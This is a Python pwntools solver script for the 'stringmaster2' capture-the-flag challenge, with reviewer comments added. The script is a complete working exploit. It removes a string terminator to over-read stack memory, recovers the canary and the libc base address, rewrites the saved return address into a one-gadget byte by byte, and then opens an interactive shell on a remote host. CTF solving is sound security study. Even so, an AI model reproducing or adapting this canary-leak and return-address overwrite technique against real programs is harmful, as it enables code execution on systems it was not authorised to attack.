#!/usr/bin/env python
# Solver script for the "stringmaster2" challenge.  It reads a stack-memory
# leak back out of the target's "print" command and then rewrites one saved
# pointer, byte by byte, through its "replace" command.
#
# NOTE(review): this is Python 2-era pwntools code (%-formatting, str payloads
# carrying raw bytes).  Under Python 3 the chr() values >= 0x80 built below
# would be sent UTF-8-encoded rather than as single bytes — confirm before
# assuming the listing behaves the same on both interpreters.
from pwn import *

# Target selection: "local" spawns the binary next to the script, anything
# else connects to the fixed host/port.  sys.argv[1] is read unguarded, so
# running with no argument fails with IndexError instead of a usage message.
if (sys.argv[1] == "local"):
    r = process("./stringmaster2")
else:
    r = remote("35.207.132.47", 22225)

# Offset of the chosen gadget inside the target's libc.  It is tied to one
# specific libc build; nothing in this file derives or validates it.
one_gadget_off = 0x10a38c

# Consume the menu: "quit" apparently occurs twice before the first prompt.
r.recvuntil("quit")
r.recvuntil("quit")
r.recvuntil("> ")
# Replace the first NUL byte of the program's string with 'A'.  Presumably
# this removes the terminator so that the "print" below keeps reading past
# the buffer into neighbouring stack memory — the information-disclosure
# bug the rest of the script depends on; verify against the binary.
r.sendline("replace " + "\x00" + "A")
r.recvuntil("quit")
r.recvuntil("> ")
r.sendline("print")

# Parse the over-read at fixed byte offsets.  One leak undoes two mitigations
# at once: the stack canary is read back instead of guessed, and a libc
# pointer exposes the randomised library base (ASLR).
r.recv(7*8)                       # 56 bytes skipped
canary = u64(r.recv(8))           # stack canary — logged only, never used again
log.info("canary: %s" % hex(canary))
r.recv(7*8)                       # 56 more bytes skipped
ret = u64(r.recv(8))              # presumably the saved return address
log.info("ret: %s" % hex(ret))
r.recv(8)                         # 8 bytes skipped
# 0x21b97 is the in-libc offset of the leaked pointer; like one_gadget_off it
# belongs to one specific libc build.
base_libc = u64(r.recv(8)) - 0x21b97
log.info("base_libc: %s" % hex(base_libc))
one_gadget = base_libc + one_gadget_off
log.info("one_gadget: %s" % hex(one_gadget))

# Rewrite `ret` into `one_gadget` one byte at a time, most significant byte
# first.  Each "replace a b" evidently swaps a single occurrence, so the loop
# counts (6, 6, 4, 4, 1, 1) presumably equal how many copies of each byte
# need replacing; they are hard-coded, not derived from the leak.
# Inconsistency: this first line shifts without `& 0xff`, unlike the others.
# That only matches the other lines while bits 48+ of both values are zero.
for i in range(6):
    r.sendline("replace " + chr(ret >> 40) + chr(one_gadget >> 40))
for i in range(6):
    r.sendline("replace " + chr((ret >> 32) & 0xff) + chr((one_gadget >> 32) & 0xff))
for i in range(4):
    r.sendline("replace " + chr((ret >> 24) & 0xff)+ chr((one_gadget >> 24) & 0xff))
for i in range(4):
    r.sendline("replace " + chr((ret >> 16) & 0xff)+ chr((one_gadget >> 16) & 0xff))
# The last two loops run exactly once each (range(1)).
for i in range(1):
    r.sendline("replace " + chr((ret >> 8) & 0xff)+ chr((one_gadget >> 8) & 0xff))
for i in range(1):
    r.sendline("replace " + chr(ret & 0xff) + chr(one_gadget & 0xff))
# Leaving the program is what lets the rewritten pointer take effect; the
# connection is then handed to the operator.
r.sendline("quit")
r.interactive()